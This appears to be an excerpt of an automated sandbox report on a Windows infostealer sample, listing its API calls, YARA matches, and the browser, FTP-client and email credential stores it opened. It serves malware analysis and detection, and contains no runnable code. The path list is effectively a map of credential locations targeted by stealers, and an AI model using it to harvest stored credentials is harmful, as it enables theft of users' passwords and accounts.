                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_0040966C
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_0040879B
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040443E GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_0040443E
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040231D LoadLibraryA,GetProcAddress,0_2_0040231D
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_3_00610380 mov edx, dword ptr fs:[00000030h]0_3_00610380
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040F731 mov eax, dword ptr fs:[00000030h]0_2_0040F731
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_004102E0 SetUnhandledExceptionFilter,RevertToSelf,0_2_004102E0
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00410042 lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,0_2_00410042
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00404313 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00404313
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_0040443E
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0041022F OleInitialize,GetUserNameA,0_2_0041022F
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040443E GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_0040443E

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\Frigate3\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FTP Explorer\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\SiteDesigner\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbarJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\TurboFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\RhinoSoft.com\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\TurboFTPJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FTPInfo\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBITJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.jsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\NetSarang\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\LeapWare\LeapFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\BitKinex\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xmlJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\AceBITJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\History.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FTPInfo\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FileZilla\filezilla.xmlJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\BitKinex\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Program Files (x86)\CuteFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\SharedSettings.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\History.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\GHISLER\wcx_ftp.iniJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\ExpanDrive\drives.jsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\BlazeFtp\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FlashFXP\4\Sites.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\INSoftware\NovaFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FTP Explorer\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FTPGetter\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Program Files (x86)\CuteFTP\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\NetSarang\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\CuteFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTPJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\SmartFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\TurboFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\Frigate3\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\SetupJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.iniJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\AceBIT\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FileZilla\sitemanager.xmlJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\TurboFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\RhinoSoft.com\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FTP Explorer\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\AceBIT\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FlashFXP\3\Quick.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FTPRush\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\Estsoft\ALFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\ExpanDrive\drives.jsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\CuteFTP\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FlashFXP\3\Sites.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xmlJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\BlazeFtp\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbarJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\FTPGetter\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\SharedSettings.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\AceBIT\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.iniJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Windows\32BitFtp.iniJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FlashFXP\4\Quick.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\3D-FTP\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\Frigate3\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\NetSarang\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbarJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FTPRush\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FlashFXP\3\History.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: HKEY_LOCAL_MACHINE\Software\TurboFTPJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\FlashFXP\4\History.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Windows\wcx_ftp.iniJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.datJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword0_2_0040E9CE
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword0_2_0040E9CE

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
